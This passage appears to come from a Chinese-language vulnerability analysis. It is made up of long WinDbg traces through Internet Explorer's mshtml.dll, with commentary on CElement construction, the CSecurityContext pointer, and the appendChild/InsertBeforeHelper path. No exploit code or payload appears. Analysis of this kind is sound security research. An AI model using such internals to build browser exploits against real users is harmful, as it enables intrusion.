ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0x6: 6a234815 8b5d0c mov ebx,dword ptr [ebp+0Ch] ss:0023:0425e640=05ad0680 1:021> eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000 eip=6a234818 esp=0425e630 ebp=0425e634 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0x9: 6a234818 56 push esi 1:021> eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000 eip=6a234819 esp=0425e62c ebp=0425e634 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0xa: 6a234819 57 push edi 1:021> eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=00000000 eip=6a23481a esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0xb: 6a23481a 8bf8 mov edi,eax 1:021> dd eax 1af02fd8 00000000 00000000 00000000 00000000 1af02fe8 00000000 00000000 00000000 00000000 1af02ff8 00000000 00000000 ???????? ???????? 1af03008 ???????? ???????? ???????? ???????? 1af03018 ???????? ???????? ???????? ???????? 1af03028 ???????? ???????? ???????? ???????? 1af03038 ???????? ???????? ???????? ???????? 1af03048 ???????? ???????? ???????? ???????? 1:021> p eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=1af02fd8 eip=6a23481c esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0xd: 6a23481c 8bf7 mov esi,edi 1:021> eax=1af02fd8 ebx=05ad0680 ecx=7782349f edx=00000000 esi=1af02fd8 edi=1af02fd8 eip=6a23481e esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0xf: 6a23481e e80c300800 call mshtml!CBase::CBase (6a2b782f) 1:021> eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=1af02fd8 edi=1af02fd8 eip=6a234823 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CElement::CElement+0x14: 6a234823 83672400 and dword ptr [edi+24h],0 ds:0023:1af02ffc=00000000 1:021> eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=1af02fd8 edi=1af02fd8 eip=6a234827 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x18: 6a234827 c707b0540f6a mov dword ptr [edi],offset mshtml!CElement::`vftable' (6a0f54b0) ds:0023:1af02fd8={mshtml!CEncode::`vftable' (6a2b785c)} 1:021> eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=1af02fd8 edi=1af02fd8 eip=6a23482d esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x1e: 6a23482d 8b03 mov eax,dword ptr [ebx] ds:0023:05ad0680={mshtml!CDoc::`vftable' (6a2a1e88)} 1:021> eax=6a2a1e88 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=1af02fd8 edi=1af02fd8 eip=6a23482f esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x20: 6a23482f 8bcb mov ecx,ebx 1:021> eax=6a2a1e88 ebx=05ad0680 ecx=05ad0680 edx=00000000 esi=1af02fd8 edi=1af02fd8 eip=6a234831 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x22: 6a234831 ff5070 call dword ptr [eax+70h] ds:0023:6a2a1ef8={mshtml!CDoc::SecurityContext (6a234733)} 1:021> eax=074befe8 ebx=05ad0680 ecx=05ad0680 edx=00000000 esi=1af02fd8 edi=1af02fd8 eip=6a234834 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x25: 6a234834 8bf0 mov esi,eax 1:021> eax=074befe8 ebx=05ad0680 ecx=05ad0680 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a234836 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x27: 6a234836 e828000000 call mshtml!CElement::ReplaceSecurityContext (6a234863) 1:021> eax=00000004 ebx=05ad0680 ecx=6a2a92e1 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a23483b esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CElement::CElement+0x2c: 6a23483b 83430808 add dword ptr [ebx+8],8 ds:0023:05ad0688=000000a0 1:021> eax=00000004 ebx=05ad0680 ecx=6a2a92e1 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a23483f esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CElement::CElement+0x30: 6a23483f e8123d0800 call mshtml!_IncrementObjectCount (6a2b8556) 1:021> eax=0000003b ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a234844 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CElement::CElement+0x35: 6a234844 8a4508 mov al,byte ptr [ebp+8] ss:0023:0425e63c=60 1:021> eax=00000060 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a234847 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CElement::CElement+0x38: 6a234847 81671cfffffbff and dword ptr [edi+1Ch],0FFFBFFFFh ds:0023:1af02ff4=00000000 1:021> eax=00000060 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a23484e esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x3f: 6a23484e 806720fe and byte ptr [edi+20h],0FEh ds:0023:1af02ff8=00 1:021> eax=00000060 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a234852 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x43: 6a234852 884718 mov byte ptr [edi+18h],al ds:0023:1af02ff0=00 1:021> eax=00000060 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a234855 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x46: 6a234855 8bc7 mov eax,edi 1:021> eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=1af02fd8 eip=6a234857 esp=0425e628 ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x48: 6a234857 5f pop edi 1:021> eax=1af02fd8 ebx=05ad0680 ecx=6a6251a0 edx=00000000 esi=074befe8 edi=00000000 eip=6a234858 esp=0425e62c ebp=0425e634 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::CElement+0x49: 6a234858 5e pop esi 1:021> dd eax 1af02fd8 6a0f54b0 00000001 00000008 00000000 1af02fe8 00000000 00000000 00000060 00000000 1af02ff8 00000000 074befe8 ???????? ???????? 1af03008 ???????? ???????? ???????? ???????? 1af03018 ???????? ???????? ???????? ???????? 1af03028 ???????? ???????? ???????? ???????? 1af03038 ???????? ???????? ???????? ???????? 1af03048 ???????? ???????? ???????? ???????? 1:021> ln 6a0f54b0 (6a0f54b0) mshtml!CElement::`vftable' | (6a1008c0) mshtml!CShape::`vftable' Exact matches: mshtml!CElement::`vftable' = <no type information> 1:021> dd 074befe8 074befe8 6a2a8c34 00000004 00000001 05ad0680 074beff8 00000000 00000000 ???????? ???????? 074bf008 ???????? ???????? ???????? ???????? 074bf018 ???????? ???????? ???????? ???????? 074bf028 ???????? ???????? ???????? ???????? 074bf038 ???????? ???????? ???????? ???????? 074bf048 ???????? ???????? ???????? ???????? 074bf058 ???????? ???????? ???????? ???????? 1:021> ln 6a2a8c34 (6a2a8c34) mshtml!CSecurityContext::`vftable' | (6a2a8c44) mshtml!CInvalidatedSecurityContext::`vftable' Exact matches: mshtml!CSecurityContext::`vftable' = <no type information>
可以看到CPhraseElement对象被初始化后的结果,有意思的是对象的0x28偏移处有个CSecurityContext对象的指针。
1:021> g Breakpoint 2 hit eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bb0 esp=0425e67c ebp=0425e718 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement: 6a234bb0 8bff mov edi,edi 1:021> p eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bb2 esp=0425e67c ebp=0425e718 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x2: 6a234bb2 55 push ebp 1:021> eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bb3 esp=0425e678 ebp=0425e718 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x3: 6a234bb3 8bec mov ebp,esp 1:021> eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bb5 esp=0425e678 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x5: 6a234bb5 83ec10 sub esp,10h 1:021> eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bb8 esp=0425e668 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x8: 6a234bb8 53 push ebx 1:021> eax=0425e750 ebx=06d62f30 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bb9 esp=0425e664 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x9: 6a234bb9 8b5d10 mov ebx,dword ptr [ebp+10h] ss:0023:0425e688=00000000 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bbc esp=0425e664 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0xc: 6a234bbc 56 push esi 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bbd esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0xd: 6a234bbd c7451000000000 mov dword ptr [ebp+10h],0 ss:0023:0425e688=00000000 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bc4 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CreateElement+0x14: 6a234bc4 85db test ebx,ebx 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bc6 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x16: 6a234bc6 0f84c67d0300 je mshtml!CreateElement+0x18 (6a26c992) [br=1] 1:021> eax=0425e750 ebx=00000000 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a26c992 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x18: 6a26c992 bb08832a6a mov ebx,offset mshtml!g_Zero (6a2a8308) 1:021> eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a26c997 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x1d: 6a26c997 e93082fcff jmp mshtml!CreateElement+0x1d (6a234bcc) 1:021> eax=0425e750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bcc esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x1d: 6a234bcc 0fb64701 movzx eax,byte ptr [edi+1] ds:0023:0425e6a9=75 1:021> eax=00000075 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bd0 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CreateElement+0x21: 6a234bd0 c1e004 shl eax,4 1:021> eax=00000750 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bd3 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x24: 6a234bd3 05709a2c6a add eax,offset mshtml!g_atagdesc (6a2c9a70) 1:021> eax=6a2ca1c0 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bd8 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x29: 6a234bd8 0f84b34e1500 je mshtml!CreateElement+0x2b (6a389a91) [br=0]1:021> p eax=6a2ca1c0 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234bde esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x38: 6a234bde 8b4008 mov eax,dword ptr [eax+8] ds:0023:6a2ca1c8={mshtml!CGenericElement::CreateElement (6a11c234)} 1:021> eax=6a11c234 ebx=6a2a8308 ecx=06d62f30 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234be1 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x3b: 6a234be1 8d4d10 lea ecx,[ebp+10h] 1:021> eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234be4 esp=0425e660 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x3e: 6a234be4 51 push ecx 1:021> eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234be5 esp=0425e65c ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x3f: 6a234be5 52 push edx 1:021> eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234be6 esp=0425e658 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x40: 6a234be6 57 push edi 1:021> eax=6a11c234 ebx=6a2a8308 ecx=0425e688 edx=05ad0680 esi=00000000 edi=0425e6a8 eip=6a234be7 esp=0425e654 ebp=0425e678 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 mshtml!CreateElement+0x41: 6a234be7 ffd0 call eax {mshtml!CGenericElement::CreateElement (6a11c234)} 1:021> ln eax (6a11c234) mshtml!CGenericElement::CreateElement | (6a11c279) mshtml!CGenericElement::CGenericElement Exact matches: mshtml!CGenericElement::CreateElement = <no type information>
可见var id_1 = document.createElement("audio");导致创建了CGenericElement对象
1:021> g Breakpoint 6 hit eax=07824fc8 ebx=07824fc8 ecx=7782349f edx=00000000 esi=0425e6a8 edi=0425e6a8 eip=6a23480f esp=0425e614 ebp=0425e638 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 mshtml!CElement::CElement: 6a23480f 8bff mov edi,edi 1:021> p eax=07824fc8 ebx=07824fc8 ecx=7782349f edx=00000000 esi=0425e6a8 edi=0425e6a8 eip=6a234811 esp=0425e614 ebp=0425e638 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 mshtml!CElement::CElement+0x2: 6a234811 55 push ebp 1:021> eax=07824fc8 ebx=07824fc8 ecx=7782349f edx=00000000 esi=0425e6a8 edi=0425e6a8 eip=6a234812 esp=0425e610 ebp=0425e638 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 mshtml!CElement::CElement+0x3: 6a234812 8bec mov ebp,esp 1:021> dd eax 07824fc8 00000000 00000000 00000000 00000000 07824fd8 00000000 00000000 00000000 00000000 07824fe8 00000000 00000000 00000000 00000000 07824ff8 00000000 00000000 ???????? ???????? 07825008 ???????? ???????? ???????? ???????? 07825018 ???????? ???????? ???????? ???????? 07825028 ???????? ???????? ???????? ???????? 07825038 ???????? ???????? ???????? ????????
这是CGenericElement对象调用的继承自基类的构造函数,没有必要单步到返回了,因为对于继承于CElement类的子类实例来说,初始化的内容都是一样的,除了0x24偏移处表示类型的flag值。
1:021> g Breakpoint 3 hit eax=00000000 ebx=0425e960 ecx=00000005 edx=00000003 esi=0425e950 edi=0425e950 eip=6c77d67f esp=0425e834 ebp=0425e870 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 jscript!cos: 6c77d67f ff259010756c jmp dword ptr [jscript!_imp__cos (6c751090)] ds:0023:6c751090={msvcrt!cos (773d8ace)}
这个就很有意思了,注意我下的断点
1:021> bl 0 e 6c77d8c0 0001 (0001) 1:**** jscript!tan 1 e 6a23d88c 0001 (0001) 1:**** mshtml!CreateElement 2 e 6a234bb0 0001 (0001) 1:**** mshtml!CreateElement 3 e 6c77d67f 0001 (0001) 1:**** jscript!cos 4 e 6a1f20c4 0001 (0001) 1:**** mshtml!CElement::appendChild 5 e 6a2bced0 0001 (0001) 1:**** mshtml!CTreeNode::CTreeNode 6 e 6a23480f 0001 (0001) 1:**** mshtml!CElement::CElement
一个常识就是CxxxElement对象与CTreeNode对象是有一一对应的关系的,但是在这里就可以看出创建元素未必就会创建CTreeNode
1:021> g Breakpoint 4 hit eax=15284fd8 ebx=6a628b0c ecx=6a1f20c4 edx=0425e7f4 esi=00001200 edi=00000000 eip=6a1f20c4 esp=0425e7c8 ebp=0425e7f8 iopl=0 nv up ei pl nz ac pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216 mshtml!CElement::appendChild: 6a1f20c4 8bff mov edi,edi 1:021> dd esp 0425e7c8 6a1f1436 150e3fd0 1b1dcfd8 0425e850 0425e7d8 176bafd0 6a1f13ba 6a2ae458 a9ca0dc9 0425e7e8 9bcb0009 1b1dcfd8 00000000 00000000 0425e7f8 0425e86c 6a32235c 150e3fd0 176bafd0 0425e808 15284fd8 0000004c 6a2ae458 00000001 0425e818 0425ea40 0425e848 176bafd0 00000000 0425e828 80070005 80020003 0dbb001b 00000000 0425e838 0000004c 15284fd8 00000000 00000001 1:021> dd 150e3fd0 150e3fd0 6a246670 00000005 00000008 07701fe8 150e3fe0 071fae80 15171fb0 00000010 8202e280 150e3ff0 00000002 104d4f00 00000000 d0d0d0d0 150e4000 ???????? ???????? ???????? ???????? 150e4010 ???????? ???????? ???????? ???????? 150e4020 ???????? ???????? ???????? ???????? 150e4030 ???????? ???????? ???????? ???????? 150e4040 ???????? ???????? ???????? ???????? 1:021> ln 6a246670 (6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable' Exact matches: mshtml!CBodyElement::`vftable' = <no type information> 1:021> dd 1b1dcfd8 1b1dcfd8 6a627f68 00000001 6a2d2fa8 1af02fd8 1b1dcfe8 6a2aaadc 00000000 00000000 00020000 1b1dcff8 03000048 00000000 ???????? ???????? 1b1dd008 ???????? ???????? ???????? ???????? 1b1dd018 ???????? ???????? ???????? ???????? 1b1dd028 ???????? ???????? ???????? ???????? 1b1dd038 ???????? ???????? ???????? ???????? 1b1dd048 ???????? ???????? ???????? ???????? 1:021> ln 6a627f68 (6a627f68) mshtml!s_apfnTrackerTearoffVtable | (6a6280a0) mshtml!s_fontFamilyMap Exact matches: mshtml!s_apfnTrackerTearoffVtable = <no type information>
看的出CElement::appendChild函数的第一个参数就是要加入的父对象(body)
1:021> t eax=150e3fd0 ebx=6a628b0c ecx=00000000 edx=00000000 esi=1b1dcfd8 edi=0425e850 eip=6a1f2170 esp=0425e76c ebp=0425e784 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::InsertBeforeHelper: 6a1f2170 8bff mov edi,edi 1:021> kv ChildEBP RetAddr Args to Child 0425e768 6a1f2148 1b1dcfd8 00000000 0425e7a4 mshtml!CElement::InsertBeforeHelper 0425e784 6a1f20fe 150e3fd0 1b1dcfd8 00000001 mshtml!CElement::insertBefore+0x3c 0425e7c4 6a1f1436 150e3fd0 1b1dcfd8 0425e850 mshtml!CElement::appendChild+0x3a 0425e7f8 6a32235c 150e3fd0 176bafd0 15284fd8 mshtml!Method_IDispatchpp_IDispatchp+0xcb 0425e86c 6a32c75a 150e3fd0 80010431 00000001 mshtml!CBase::ContextInvokeEx+0x5dc 0425e8bc 6a32c79a 150e3fd0 80010431 00000001 mshtml!CElement::ContextInvokeEx+0x9d 0425e8e8 6a2d3104 150e3fd0 80010431 00000001 mshtml!CInput::VersionedInvokeEx+0x2d 0425e93c 6c75a22a 06fa2fd8 80010431 00000001 mshtml!PlainInvokeEx+0xeb 0425e978 6c75a175 1a6c4d10 80010431 00000409 jscript!IDispatchExInvokeEx2+0x104 0425e9b4 6c75a3f6 1a6c4d10 00000409 00000001 jscript!IDispatchExInvokeEx+0x6a 0425ea74 6c75a4a0 80010431 00000001 00000000 jscript!InvokeDispatchEx+0x98 0425eaa8 6c76d8c8 1a6c4d10 0425eadc 00000001 jscript!VAR::InvokeByName+0x139 0425eaf4 6c76d96f 1a6c4d10 00000001 00000000 jscript!VAR::InvokeDispName+0x7d 0425eb20 6c76e3e7 1a6c4d10 00000000 00000001 jscript!VAR::InvokeByDispID+0xce
从回溯传递的参数就可以看出上几层函数其实只是简单的封装(原来的参数1由eax传递),真正的功能由CElement::InsertBeforeHelper实现
1:021> eax=150e3fd0 ebx=6a628b0c ecx=150e3fd0 edx=00000000 esi=150e3fd0 edi=00000000 eip=6a1f218d esp=0425e710 ebp=0425e768 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::InsertBeforeHelper+0x1d: 6a1f218d e86ea20b00 call mshtml!CElement::Doc (6a2ac400)
这个函数首先调用的就是CElement::Doc,只有一个ecx传递下去。
; public: class CDoc * __thiscall CElement::Doc(void)const ?Doc@CElement@@QBEPAVCDoc@@XZ proc near mov eax, [ecx] mov edx, [eax+70h] call edx mov eax, [eax+0Ch] retn ?Doc@CElement@@QBEPAVCDoc@@XZ endp
可以看到只是简单的调用对象的一个虚函数,然后根据返回的指针取值。
1:021> t eax=150e3fd0 ebx=6a628b0c ecx=150e3fd0 edx=00000000 esi=150e3fd0 edi=00000000 eip=6a2ac400 esp=0425e70c ebp=0425e768 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::Doc: 6a2ac400 8b01 mov eax,dword ptr [ecx] ds:0023:150e3fd0={mshtml!CBodyElement::`vftable' (6a246670)} 1:021> eax=6a246670 ebx=6a628b0c ecx=150e3fd0 edx=00000000 esi=150e3fd0 edi=00000000 eip=6a2ac402 esp=0425e70c ebp=0425e768 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::Doc+0x2: 6a2ac402 8b5070 mov edx,dword ptr [eax+70h] ds:0023:6a2466e0={mshtml!CElement::SecurityContext (6a2ac3d0)} 1:021> eax=6a246670 ebx=6a628b0c ecx=150e3fd0 edx=6a2ac3d0 esi=150e3fd0 edi=00000000 eip=6a2ac405 esp=0425e70c ebp=0425e768 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 mshtml!CElement::Doc+0x5: 6a2ac405 ffd2 call edx {mshtml!CElement::SecurityContext (6a2ac3d0)} 1:021> ln eax (6a246670) mshtml!CBodyElement::`vftable' | (6a2a9108) mshtml!CCaret::`vftable' Exact matches: mshtml!CBodyElement::`vftable' = <no type information>
可以看到ecx还是body(父对象)
1:021> p eax=18b1cfe8 ebx=6a628b0c ecx=06d62f30 edx=6a2ac916 esi=150e3fd0 edi=00000000 eip=6a2ac407 esp=0425e70c ebp=0425e768 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CElement::Doc+0x7: 6a2ac407 8b400c mov eax,dword ptr [eax+0Ch] ds:0023:18b1cff4=05ad0680 1:021> dd eax 18b1cfe8 6a2a8c34 00000008 00000001 05ad0680 18b1cff8 00000000 06d62f30 ???????? ???????? 18b1d008 ???????? ???????? ???????? ???????? 18b1d018 ???????? ???????? ???????? ???????? 18b1d028 ???????? ???????? ???????? ???????? 18b1d038 ???????? ???????? ???????? ???????? 18b1d048 ???????? ???????? ???????? ???????? 18b1d058 ???????? ???????? ???????? ???????? 1:021> ln poi(eax) (6a2a8c34) mshtml!CSecurityContext::`vftable' | (6a2a8c44) mshtml!CInvalidatedSecurityContext::`vftable' Exact matches: mshtml!CSecurityContext::`vftable' = <no type information>
这是call之后的返回值,可以看出返回其实是CSecurityContext对象
